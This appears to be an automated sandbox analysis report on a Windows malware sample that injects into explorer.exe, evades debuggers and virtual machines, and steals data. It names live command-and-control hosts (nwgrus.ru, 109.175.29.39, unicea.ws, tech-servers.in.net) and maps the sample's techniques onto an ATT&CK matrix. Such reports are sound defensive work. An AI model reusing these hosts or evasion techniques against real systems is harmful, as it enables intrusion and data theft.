      Source: explorer.exe, 0000000B.00000003.2628458064.000000000487E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}NWTVCDUMOB.mp3>
      Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 0000000B.00000002.2963794054.000000000817A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.000000000817A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_loc
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02C90D90 mov eax, dword ptr fs:[00000030h]0_2_02C90D90
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02C9092B mov eax, dword ptr fs:[00000030h]0_2_02C9092B
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_02CDF365 push dword ptr fs:[00000030h]0_2_02CDF365
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_02C604ED push dword ptr fs:[00000030h]5_2_02C604ED
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_0477092B mov eax, dword ptr fs:[00000030h]5_2_0477092B
      Source: C:\Users\user\AppData\Roaming\tttcvvaCode function: 5_2_04770D90 mov eax, dword ptr fs:[00000030h]5_2_04770D90

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: tttcvva.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeThread created: C:\Windows\explorer.exe EIP: 8C419A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaThread created: unknown EIP: 95619A8Jump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\tttcvvaSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1775341157.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000B.00000002.2955410172.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanjon
      Source: explorer.exe, 00000001.00000000.1773845520.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 0000000B.00000002.2969745207.000000000B673000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2911915797.000000000B66C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndk
      Source: explorer.exe, 00000001.00000000.1774065861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeCode function: 0_2_00417090 InterlockedExchangeAdd,ReadConsoleA,FindAtomW,GetConsoleFontSize,SearchPathW,SetDefaultCommConfigW,MoveFileA,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,OpenFileMappingA,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,LoadLibraryA,InterlockedDecrement,0_2_00417090

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping521
      Security Software Discovery
      Remote ServicesData from Local System2
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      23
      Virtualization/Sandbox Evasion
      LSASS Memory23
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing
      Cached Domain Credentials13
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533009 Sample: 3sfCdeA1H2.exe Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 26 nwgrus.ru 2->26 28 api.msn.com 2->28 40 Multi AV Scanner detection for domain / URL 2->40 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 6 other signatures 2->46 8 3sfCdeA1H2.exe 2->8         started        11 tttcvva 2->11         started        13 explorer.exe 23 142 2->13         started        signatures3 process4 signatures5 48 Detected unpacking (changes PE section rights) 8->48 50 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->50 52 Maps a DLL or memory area into another process 8->52 62 2 other signatures 8->62 15 explorer.exe 26 3 8->15 injected 54 Multi AV Scanner detection for dropped file 11->54 56 Machine Learning detection for dropped file 11->56 58 Checks if the current machine is a virtual machine (disk enumeration) 11->58 60 Query firmware table information (likely to detect VMs) 13->60 process6 dnsIp7 30 nwgrus.ru 109.175.29.39, 49736, 49737, 49738 BIHNETBIHNETAutonomusSystemBA Bosnia and Herzegowina 15->30 22 C:\Users\user\AppData\Roaming\tttcvva, PE32 15->22 dropped 24 C:\Users\user\...\tttcvva:Zone.Identifier, ASCII 15->24 dropped 32 System process connects to network (likely due to code injection or exploit) 15->32 34 Benign windows process drops PE files 15->34 36 Deletes itself after installation 15->36 38 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->38 20 WerFault.exe 21 15->20         started        file8 signatures9 process10

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      3sfCdeA1H2.exe42%ReversingLabs
      3sfCdeA1H2.exe38%VirustotalBrowse
      3sfCdeA1H2.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\tttcvva100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\tttcvva42%ReversingLabs
      C:\Users\user\AppData\Roaming\tttcvva38%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLink
      nwgrus.ru12%VirustotalBrowse
      api.msn.com0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
      https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
      https://aka.ms/odirmr0%VirustotalBrowse
      https://aka.ms/odirmv0%VirustotalBrowse
      http://unicea.ws/tmp/index.php0%VirustotalBrowse
      https://api.msn.com/D0%VirustotalBrowse
      http://nwgrus.ru/tmp/index.php17%VirustotalBrowse
      https://api.msn.com/q0%VirustotalBrowse
      https://api.msn.com/X0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
      https://wns.windows.com/L0%VirustotalBrowse
      http://tech-servers.in.net/tmp/index.php2%VirustotalBrowse
      https://api.msn.com/v1/news/Feed/Windows?&0%VirustotalBrowse
      https://api.msn.com:443/v1/news/Feed/Windows?V0%VirustotalBrowse
      https://www.msn.com:443/en-us/feed0%VirustotalBrowse
      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      109.175.29.39
      truetrueunknown
      api.msn.com
      unknown
      unknowntrueunknown
      NameMaliciousAntivirus DetectionReputation
      http://unicea.ws/tmp/index.phptrueunknown
      http://nwgrus.ru/tmp/index.phptrueunknown
      http://tech-servers.in.net/tmp/index.phptrueunknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
        unknown
        https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://aka.ms/odirmvexplorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://excel.office.comexplorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.microexplorer.exe, 00000001.00000000.1776956653.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1776433497.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1778850538.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.msn.com/Dexplorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://powerpoint.office.comEMexplorer.exe, 0000000B.00000003.2677069781.000000000842C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083F0000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://api.msn.com/qexplorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1780555667.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://api.msn.com/Xexplorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1780555667.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://word.office.comexplorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://excel.office.com30#explorer.exe, 0000000B.00000003.2670022683.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.00000000083C2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2681492107.00000000083D5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000083C2000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
